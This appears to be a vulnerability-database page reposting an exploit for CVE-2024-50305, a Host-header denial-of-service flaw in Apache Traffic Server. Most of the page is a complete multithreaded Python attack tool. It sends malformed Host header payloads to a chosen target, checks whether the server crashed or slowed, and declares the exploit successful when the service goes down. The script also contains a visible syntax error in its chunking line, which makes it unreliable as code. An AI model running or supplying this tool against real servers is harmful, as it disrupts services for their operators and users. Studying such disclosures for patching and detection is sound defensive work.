Lucene search
K

📄 Apache Traffic Server 9.2.5 Denial of Service

🗓️ 20 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 122 Views

Apache Traffic Server DoS due to improper Host header handling (CVE-2024-50305).

Related
Code
=============================================================================================================================================
    | # Title     : Apache Traffic Server Host Header Denial of Service Vulnerability                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://trafficserver.apache.org/                                                                                           |
    =============================================================================================================================================
    
    [+] Summary    :  A denial-of-service (DoS) vulnerability identified as CVE-2024-50305 affects Apache Traffic Server due to improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests.
                      An attacker may send specially crafted requests containing abnormal, oversized, or non-standard Host header values. Under certain conditions, 
    				  this may lead to service instability, excessive resource consumption, unexpected connection termination, or potential process crashes, resulting in temporary denial of service.
                     The issue highlights insufficient input validation within HTTP request parsing logic. Proper boundary checks, strict header validation, and adherence to RFC standards are recommended to mitigate the risk
    
    [+] POC   :
    
    #!/usr/bin/env python3
    
    import socket
    import sys
    import time
    import argparse
    import threading
    import ssl
    import ipaddress
    import random
    import string
    from concurrent.futures import ThreadPoolExecutor, as_completed
    from typing import List, Tuple, Optional, Dict, Any
    from enum import Enum
    from dataclasses import dataclass, field
    from contextlib import contextmanager
    import logging
    from collections import Counter
    
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
        datefmt='%H:%M:%S'
    )
    logger = logging.getLogger('cve_2024_50305')
    
    class ServiceState(Enum):
        """Possible service states"""
        UP = "up"
        DOWN = "down"
        UNKNOWN = "unknown"
        FILTERED = "filtered"
        SLOW = "slow"
        ERROR = "error"
    
    class Protocol(Enum):
        """Connection protocol"""
        HTTP1 = "http/1.1"
        HTTP2 = "http/2"
        UNKNOWN = "unknown"
    
    class CrashConfidence(Enum):
        """Confidence level in crash detection"""
        HIGH = "high"     
        MEDIUM = "medium" 
        LOW = "low"       
        NONE = "none"     
    
    @dataclass
    class RequestResult:
        """Result of a single request"""
        payload: str
        response_time: float
        status_code: Optional[int] = None
        crash_confidence: CrashConfidence = CrashConfidence.NONE
        error: Optional[str] = None
        timeout_occurred: bool = False
        bytes_received: int = 0
        connection_reset: bool = False
    
    @dataclass
    class Statistics:
        """Attack statistics - optimized to avoid memory growth"""
        total_requests: int = 0
        crashes_high: int = 0
        crashes_medium: int = 0
        crashes_low: int = 0
        timeouts: int = 0
        connection_refused: int = 0
        connection_reset: int = 0
        successful: int = 0
        errors: int = 0
        status_codes: Counter = field(default_factory=Counter)
        # Response time stats - stored compactly
        response_time_sum: float = 0.0
        response_time_count: int = 0
        response_time_min: float = float('inf')
        response_time_max: float = 0.0
    
    class HTTPResponseParser:
        """HTTP response parser"""
        
        @staticmethod
        def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]:
            """
            Parses the first status line of an HTTP response
            """
            if not data:
                return None, None
    
            end_of_line = data.find(b'\r\n')
            if end_of_line == -1:
                return None, None
                
            first_line = data[:end_of_line].decode('ascii', errors='ignore')
            parts = first_line.split(' ')
            
            if len(parts) < 2:
                return None, None
    
            protocol = Protocol.UNKNOWN
            if parts[0].startswith('HTTP/1'):
                protocol = Protocol.HTTP1
            elif parts[0].startswith('HTTP/2'):
                protocol = Protocol.HTTP2
    
            try:
                status_code = int(parts[1])
                return status_code, protocol
            except (ValueError, IndexError):
                return None, protocol
    
    class TargetResolver:
        """Resolves target addresses with IPv4/IPv6 support"""
        
        def __init__(self, prefer_ipv6: bool = False):
            self.prefer_ipv6 = prefer_ipv6
            self._cache = {}
            
        def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]:
            """
            Checks if the text is an IP address and returns its family
            Returns: (is_ip, family)
            """
            try:
                ip_obj = ipaddress.ip_address(target)
                if ip_obj.version == 6:
                    return True, socket.AF_INET6
                else:
                    return True, socket.AF_INET
            except ValueError:
                return False, None
        
        def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]:
            """
            Resolves target to (ip, port, family)
            
            Returns:
                (ip, port, socket_family) or None on failure
            """
            cache_key = f"{target}:{port}:{self.prefer_ipv6}"
            if cache_key in self._cache:
                return self._cache[cache_key]
    
            is_ip, ip_family = self._is_ip_address(target)
            if is_ip:
                result = (target, port, ip_family)
                self._cache[cache_key] = result
                return result
    
            if self.prefer_ipv6:
                families = [socket.AF_INET6, socket.AF_INET]
            else:
                families = [socket.AF_INET, socket.AF_INET6]
                
            for family in families:
                try:
                    addrinfo = socket.getaddrinfo(
                        target, 
                        port, 
                        family=family,
                        type=socket.SOCK_STREAM,
                        proto=socket.IPPROTO_TCP
                    )
                    
                    if addrinfo:
    
                        _, _, _, _, sockaddr = addrinfo[0]
                        if family == socket.AF_INET6:
                            ip, port, flowinfo, scopeid = sockaddr
                        else:
                            ip, port = sockaddr
                        
                        result = (ip, port, family)
                        self._cache[cache_key] = result
                        logger.debug(f"Resolved {target} -> {ip} ({'IPv6' if family == socket.AF_INET6 else 'IPv4'})")
                        return result
                        
                except socket.gaierror:
                    continue
                except Exception as e:
                    logger.debug(f"Error resolving {target} using family {family}: {e}")
                    continue
                    
            logger.error(f"Failed to resolve {target}")
            return None
    
    class ServiceChecker:
        """Accurate service status checker"""
        
        def __init__(self, timeout: float = 5, max_header_size: int = 8192):
            self.timeout = timeout
            self.max_header_size = max_header_size
            
        @contextmanager
        def _create_socket(self, family: int, use_ssl: bool = False, hostname: str = None):
            """Creates a socket with SSL support"""
            sock = socket.socket(family, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            
            try:
                if use_ssl:
                    context = ssl.create_default_context()
                    context.check_hostname = False
                    context.verify_mode = ssl.CERT_NONE
    
                    is_ip = False
                    if hostname:
                        try:
                            ipaddress.ip_address(hostname)
                            is_ip = True
                        except ValueError:
                            pass
    
                    server_hostname = hostname if hostname and not is_ip else None
                    sock = context.wrap_socket(sock, server_hostname=server_hostname)
                yield sock
            finally:
                try:
                    sock.close()
                except:
                    pass
        
        def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]:
            """Checks validity of HTTP response and extracts status code"""
            status_code, _ = HTTPResponseParser.parse_status_line(data)
            return status_code is not None, status_code
        
        def check(self, ip: str, port: int, family: int, 
                  hostname: str = None, use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]:
            """
            Performs a detailed service check
            
            Returns:
                (State, Response Time, Status Code)
            """
            start_time = time.monotonic()
            
            try:
                with self._create_socket(family, use_ssl, hostname or ip) as sock:
    
                    host_header = hostname or ip
                    if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['):
                        host_header = f"[{ip}]"
                    
                    request = (
                        f"GET / HTTP/1.1\r\n"
                        f"Host: {host_header}\r\n"
                        f"User-Agent: CVE-2024-50305-Checker/1.0\r\n"
                        f"Accept: text/html,application/xhtml+xml\r\n"
                        f"Accept-Language: en-US,en;q=0.9\r\n"
                        f"Connection: close\r\n"
                        f"\r\n"
                    ).encode()
    
                    if family == socket.AF_INET6:
                        sock.connect((ip, port, 0, 0))
                    else:
                        sock.connect((ip, port))
    
                    sock.sendall(request)
    
                    response = b""
                    while True:
                        try:
                            chunk = sock.recv(self.max_header_size)
                            if not chunk:
                                break
                            response += chunk
    
                            if b'\r\n\r\n' in response:
                                break
    
                            if len(response) > self.max_header_size:
                                break
                        except socket.timeout:
                            break
                    
                    response_time = time.monotonic() - start_time
    
                    is_valid, status_code = self._is_valid_http_response(response)
                    
                    if is_valid and status_code is not None:
                        if 200 <= status_code < 600:  
                            return ServiceState.UP, response_time, status_code
                        else:
                            return ServiceState.UP, response_time, status_code
                    elif response:
                        return ServiceState.UNKNOWN, response_time, None
                    else:
                        return ServiceState.UNKNOWN, response_time, None
                        
            except socket.timeout:
                return ServiceState.SLOW, self.timeout, None
            except ConnectionRefusedError:
                return ServiceState.DOWN, 0, None
            except ConnectionResetError:
                return ServiceState.UNKNOWN, time.monotonic() - start_time, None
            except socket.gaierror:
                return ServiceState.ERROR, 0, None
            except Exception as e:
                logger.debug(f"Check Error: {e}")
                return ServiceState.ERROR, 0, None
    
    class RequestSender:
        """Sends malicious requests with detailed result analysis"""
        
        def __init__(self, timeout: float = 5, max_response_size: int = 4096):
            self.timeout = timeout
            self.max_response_size = max_response_size
            
        @contextmanager
        def _create_socket(self, family: int):
            """Creates a socket"""
            sock = socket.socket(family, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            try:
                yield sock
            finally:
                try:
                    sock.close()
                except:
                    pass
        
        def _evaluate_crash_confidence(self, result: RequestResult, 
                                       normal_behavior: Dict) -> CrashConfidence:
            """
            Evaluates crash detection confidence based on several factors
            """
    
            if result.connection_reset:
                return CrashConfidence.HIGH
    
            if result.timeout_occurred and result.bytes_received == 0:
                return CrashConfidence.MEDIUM
    
            if result.bytes_received == 0 and not result.error:
                return CrashConfidence.LOW
                
            return CrashConfidence.NONE
        
        def send(self, ip: str, port: int, family: int, 
                  host_payload: str, baseline_time: float = 1.0) -> RequestResult:
            """
            Sends a malicious request with accurate result analysis
            
            Args:
                baseline_time: Normal service response time
            """
            result = RequestResult(payload=host_payload, response_time=0.0)
            start_time = time.monotonic()
            
            try:
                with self._create_socket(family) as sock:
    
                    try:
                        if family == socket.AF_INET6:
                            sock.connect((ip, port, 0, 0))
                        else:
                            sock.connect((ip, port))
                    except ConnectionRefusedError:
                        result.error = "connection_refused"
                        result.response_time = time.monotonic() - start_time
                        return result
    
                    try:
                        encoded_host = host_payload.encode('utf-8')
                    except UnicodeEncodeError:
                        encoded_host = host_payload.encode('ascii', errors='replace')
                    request = (
                        b"GET / HTTP/1.1\r\n"
                        b"Host: " + encoded_host + b"\r\n"
                        b"User-Agent: CVE-2024-50305/1.0\r\n"
                        b"Accept: */*\r\n"
                        b"Connection: close\r\n"
                        b"\r\n"
                    )
    
                    try:
                        sock.sendall(request)
                    except ConnectionResetError:
                        result.connection_reset = True
                        result.response_time = time.monotonic() - start_time
                        result.crash_confidence = CrashConfidence.HIGH
                        return result
                    except BrokenPipeError:
                        result.connection_reset = True
                        result.response_time = time.monotonic() - start_time
                        result.crash_confidence = CrashConfidence.HIGH
    
                    response = b""
                    try:
                        while True:
                            try:
                                chunk = sock.recv(4096)
                                if not chunk:
                                    break
                                response += chunk
    
                                if len(response) > self.max_response_size:
                                    break
                            except socket.timeout:
                                result.timeout_occurred = True
                                break
                    except ConnectionResetError:
                        result.connection_reset = True
                        result.crash_confidence = CrashConfidence.HIGH
                    
                    result.response_time = time.monotonic() - start_time
                    result.bytes_received = len(response)
    
                    if response:
                        status_code, _ = HTTPResponseParser.parse_status_line(response)
                        result.status_code = status_code
                        
                        if status_code is not None:
                            result.crash_confidence = CrashConfidence.NONE
                        else:
    
                            result.crash_confidence = CrashConfidence.LOW
                    if result.crash_confidence == CrashConfidence.NONE:
                        result.crash_confidence = self._evaluate_crash_confidence(result, {})
                        
            except Exception as e:
                result.error = str(e)
                result.response_time = time.monotonic() - start_time
                
            return result
    
    class PayloadGenerator:
        """Generates malicious Host values"""
    
        BASE_PAYLOADS = [
            ":", "::", "[::1]", "", "\0",
            "localhost:8080:extra", "host\x00injection",
        ]
        
        SPECIAL_CHARS = list(string.punctuation + string.whitespace)
        
        @classmethod
        def generate(cls, count: int = 30) -> List[str]:
            """Generates a list of payloads"""
            count = max(10, min(count, 100)) 
            
            payloads = set(cls.BASE_PAYLOADS)
    
            for length in [100, 500, 1000, 2000, 5000]:
                if len(payloads) < count:
                    payloads.add('A' * length)
                    payloads.add('B' * length)
            random_needed = count - len(payloads)
            if random_needed > 0:
                for _ in range(random_needed):
                    length = random.randint(5, 50)
                    random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length))
                    payloads.add(random_payload)
    
            unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"]
            payloads.update(unicode_samples[:max(0, count - len(payloads))])
            
            return list(payloads)[:count]
    
    class StatisticsCollector:
        """Thread-safe statistics collection with memory control"""
        
        def __init__(self, max_response_times: int = 1000):
            self.lock = threading.Lock()
            self.stats = Statistics()
            self.max_response_times = max_response_times
            self._response_times_sample = []  # Limited sample for analysis
            
        def add_result(self, result: RequestResult):
            """Adds a result in a thread-safe manner"""
            with self.lock:
                self.stats.total_requests += 1
    
                if result.crash_confidence == CrashConfidence.HIGH:
                    self.stats.crashes_high += 1
                elif result.crash_confidence == CrashConfidence.MEDIUM:
                    self.stats.crashes_medium += 1
                elif result.crash_confidence == CrashConfidence.LOW:
                    self.stats.crashes_low += 1
    
                if result.error == "connection_refused":
                    self.stats.connection_refused += 1
                elif result.connection_reset:
                    self.stats.connection_reset += 1
                elif result.error:
                    self.stats.errors += 1
                
                if result.timeout_occurred:
                    self.stats.timeouts += 1
                
                if result.status_code is not None:
                    self.stats.successful += 1
                    self.stats.status_codes[result.status_code] += 1
    
                if result.response_time > 0:
                    self.stats.response_time_sum += result.response_time
                    self.stats.response_time_count += 1
                    self.stats.response_time_min = min(self.stats.response_time_min, result.response_time)
                    self.stats.response_time_max = max(self.stats.response_time_max, result.response_time)
    
                    if len(self._response_times_sample) < self.max_response_times:
                        self._response_times_sample.append(result.response_time)
        
        def get_stats(self) -> Statistics:
            """Gets a copy of the statistics"""
            with self.lock:
                stats_copy = Statistics(
                    total_requests=self.stats.total_requests,
                    crashes_high=self.stats.crashes_high,
                    crashes_medium=self.stats.crashes_medium,
                    crashes_low=self.stats.crashes_low,
                    timeouts=self.stats.timeouts,
                    connection_refused=self.stats.connection_refused,
                    connection_reset=self.stats.connection_reset,
                    successful=self.stats.successful,
                    errors=self.stats.errors,
                    status_codes=self.stats.status_codes.copy(),
                    response_time_sum=self.stats.response_time_sum,
                    response_time_count=self.stats.response_time_count,
                    response_time_min=self.stats.response_time_min,
                    response_time_max=self.stats.response_time_max
                )
                return stats_copy
        
        def get_average_response_time(self) -> float:
            """Calculates average response time"""
            if self.stats.response_time_count > 0:
                return self.stats.response_time_sum / self.stats.response_time_count
            return 0.0
    
    class CVE202450305Exploit:
        """Main exploit class"""
        
        def __init__(self, target: str, port: int = 80, threads: int = 5,
                     timeout: float = 5, prefer_ipv6: bool = False,
                     use_ssl: bool = False, rate_limit: float = 0.1):
     
            if not 1 <= port <= 65535:
                raise ValueError(f"Invalid port number: {port}")
            
            if threads < 1 or threads > 100:
                raise ValueError(f"Thread count must be between 1 and 100")
            
            self.target = target
            self.port = port
            self.threads = threads
            self.timeout = timeout
            self.prefer_ipv6 = prefer_ipv6
            self.use_ssl = use_ssl
            self.rate_limit = rate_limit 
            self.resolver = TargetResolver(prefer_ipv6)
            self.checker = ServiceChecker(timeout)
            self.sender = RequestSender(timeout)
            self.stats = StatisticsCollector()
            self.target_ip = None
            self.target_family = None
            self.baseline_state = ServiceState.UNKNOWN
            self.baseline_time = 1.0  # Default value
            self.baseline_status = None
            self.is_ip_target = False
        
        def initialize(self) -> bool:
            """Initializes exploit and resolves target"""
            logger.info(f"Initializing exploit for target {self.target}:{self.port}")
    
            resolved = self.resolver.resolve(self.target, self.port)
            if not resolved:
                logger.error("Failed to resolve target")
                return False
                
            self.target_ip, _, self.target_family = resolved
    
            try:
                ipaddress.ip_address(self.target)
                self.is_ip_target = True
            except ValueError:
                self.is_ip_target = False
            
            logger.info(f"Target resolved: {self.target_ip} "
                       f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})")
    
            logger.info("Performing baseline service check...")
            state, resp_time, status = self.checker.check(
                self.target_ip, self.port, self.target_family,
                hostname=self.target if not self.is_ip_target else None, 
                use_ssl=self.use_ssl
            )
            
            self.baseline_state = state
            if resp_time > 0:
                self.baseline_time = resp_time
            self.baseline_status = status
            
            if state == ServiceState.UP:
                logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)")
                return True
            elif state == ServiceState.SLOW:
                logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)")
                return True
            elif state == ServiceState.UNKNOWN:
                logger.warning(f" Service status is UNKNOWN")
                return True
            else:
                logger.error(f" Service is NOT running: {state.value}")
                return False
        
        def _process_payload_chunk(self, payloads: List[str], iteration: int, 
                                   chunk_idx: int) -> List[RequestResult]:
            """Processes a subset of payloads"""
            results = []
            
            with ThreadPoolExecutor(max_workers=self.threads) as executor:
                future_to_payload = {}
                
                for payload in payloads:
    
                    if self.rate_limit > 0:
                        time.sleep(self.rate_limit)
                    
                    future = executor.submit(
                        self.sender.send,
                        self.target_ip,
                        self.port,
                        self.target_family,
                        payload,
                        self.baseline_time
                    )
                    future_to_payload[future] = payload
                
                for future in as_completed(future_to_payload):
                    try:
                        result = future.result(timeout=self.timeout + 2)
                        results.append(result)
                        self.stats.add_result(result)
    
                        if result.crash_confidence == CrashConfidence.HIGH:
                            logger.info(f"    HIGH confidence crash: {repr(result.payload)[:50]}...")
                        elif result.crash_confidence == CrashConfidence.MEDIUM:
                            logger.debug(f"    MEDIUM confidence: {repr(result.payload)[:50]}...")
                        elif result.connection_reset:
                            logger.debug(f"    Connection reset: {repr(result.payload)[:50]}...")
                        elif result.timeout_occurred:
                            logger.debug(f"    Timeout: {repr(result.payload)[:50]}...")
                            
                    except Exception as e:
                        logger.error(f"Error processing result: {e}")
                        
            return results
        
        def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]:
            """
            Executes the attack
            
            Returns:
                (Exploit_Success, Statistics)
            """
            logger.info("=" * 60)
            logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit")
            logger.info("=" * 60)
            logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})")
            logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}")
            logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s")
            logger.info(f"Rate limit: {self.rate_limit}s")
            logger.info(f"Payloads: {payload_count}, Iterations: {iterations}")
            logger.info("=" * 60)
            payloads = PayloadGenerator.generate(payload_count)
            logger.info(f" Generated {len(payloads)} malicious Host values")
    
            all_results = []
            
            for iteration in range(iterations):
                logger.info(f"\n Iteration {iteration + 1}/{iterations}")
    
                chunk_size = max(1, len(payloads) 
                chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)]
                
                for chunk_idx, chunk in enumerate(chunks):
                    logger.debug(f"   Processing chunk {chunk_idx + 1}/{len(chunks)}")
                    results = self._process_payload_chunk(chunk, iteration, chunk_idx)
                    all_results.extend(results)
    
                    stats = self.stats.get_stats()
                    logger.info(f"   Progress: {stats.total_requests}/{iterations * len(payloads)} "
                              f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})")
    
                    if chunk_idx < len(chunks) - 1:
                        time.sleep(1)
    
            final_stats = self.stats.get_stats()
            avg_time = self.stats.get_average_response_time()
            
            logger.info("\n" + "=" * 60)
            logger.info(" Final Statistics:")
            logger.info(f" Total Requests: {final_stats.total_requests}")
            logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}")
            logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}")
            logger.info(f" LOW confidence crashes: {final_stats.crashes_low}")
            logger.info(f" Timeouts: {final_stats.timeouts}")
            logger.info(f" Connection resets: {final_stats.connection_reset}")
            logger.info(f" Connection refused: {final_stats.connection_refused}")
            logger.info(f" Successful responses: {final_stats.successful}")
            
            if final_stats.status_codes:
                logger.info(f"   Status Codes: {dict(final_stats.status_codes)}")
            
            if final_stats.response_time_count > 0:
                logger.info(f"   Response Time - Avg: {avg_time:.3f}s")
                logger.info(f"   Response Time - Min: {final_stats.response_time_min:.3f}s")
                logger.info(f"   Response Time - Max: {final_stats.response_time_max:.3f}s")
            
            logger.info("=" * 60)
    
            logger.info("\n Verifying exploit success...")
            time.sleep(3)
    
            post_state, post_time, post_status = self.checker.check(
                self.target_ip, self.port, self.target_family,
                hostname=self.target if not self.is_ip_target else None,
                use_ssl=self.use_ssl
            )
            
            success = False
            reasons = []
            
            if final_stats.crashes_high > 0:
                reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes")
                success = True
                
            if final_stats.crashes_medium > 3:
                reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes")
                success = True
                
            if self.baseline_state == ServiceState.UP:
                if post_state == ServiceState.DOWN:
                    reasons.append("Service stopped after attack")
                    success = True
                elif post_state == ServiceState.SLOW and self.baseline_time > 0:
                    slowdown_ratio = post_time / self.baseline_time
                    if slowdown_ratio > 3:
                        reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)")
                        success = True
            
            if success:
                logger.info("Exploit Successful!")
                for reason in reasons:
                    logger.info(f"   • {reason}")
                return True, final_stats
            else:
                logger.info(" Exploit Failed")
                if reasons:
                    logger.info(f"   ({', '.join(reasons)})")
                else:
                    logger.info("   No evidence of vulnerability found")
                return False, final_stats
    
    
    def main():
        """Main function"""
        parser = argparse.ArgumentParser(
            description="CVE-2024-50305 - Apache Traffic Server DoS Exploit",
            formatter_class=argparse.RawDescriptionHelpFormatter
        )
        
        parser.add_argument("target", help="Target address (IP or domain)")
        parser.add_argument("-p", "--port", type=int, default=80, 
                            help="Target port (1-65535, default: 80)")
        parser.add_argument("-t", "--threads", type=int, default=5, 
                            help="Thread count (1-100, default: 5)")
        parser.add_argument("--timeout", type=float, default=5, 
                            help="Connection timeout in seconds (default: 5)")
        parser.add_argument("--ipv6", action="store_true", 
                            help="Prefer IPv6")
        parser.add_argument("--ssl", action="store_true", 
                            help="Use HTTPS/SSL")
        parser.add_argument("--rate-limit", type=float, default=0.05,
                            help="Delay between requests in seconds (default: 0.05)")
        parser.add_argument("-c", "--payloads", type=int, default=30,
                            help="Number of payloads to test (10-100, default: 30)")
        parser.add_argument("-i", "--iterations", type=int, default=3,
                            help="Number of iterations (default: 3)")
        parser.add_argument("-v", "--verbose", action="store_true", 
                            help="Show detailed information")
        
        args = parser.parse_args()
    
        if args.verbose:
            logger.setLevel(logging.DEBUG)
        
        try:
    
            exploit = CVE202450305Exploit(
                target=args.target,
                port=args.port,
                threads=args.threads,
                timeout=args.timeout,
                prefer_ipv6=args.ipv6,
                use_ssl=args.ssl,
                rate_limit=args.rate_limit
            )
            
            if not exploit.initialize():
                sys.exit(2)
                
            success, stats = exploit.run(
                payload_count=args.payloads,
                iterations=args.iterations
            )
    
            sys.exit(0 if success else 1)
            
        except KeyboardInterrupt:
            logger.info("\nAttack stopped by user")
            sys.exit(2)
        except ValueError as e:
            logger.error(f"Input Error: {e}")
            sys.exit(2)
        except Exception as e:
            logger.error(f"Unexpected Error: {e}")
            if args.verbose:
                import traceback
                traceback.print_exc()
            sys.exit(2)
    
    
    if __name__ == "__main__":
        main()
    
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Feb 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.17.5
EPSS0.00318
SSVC
122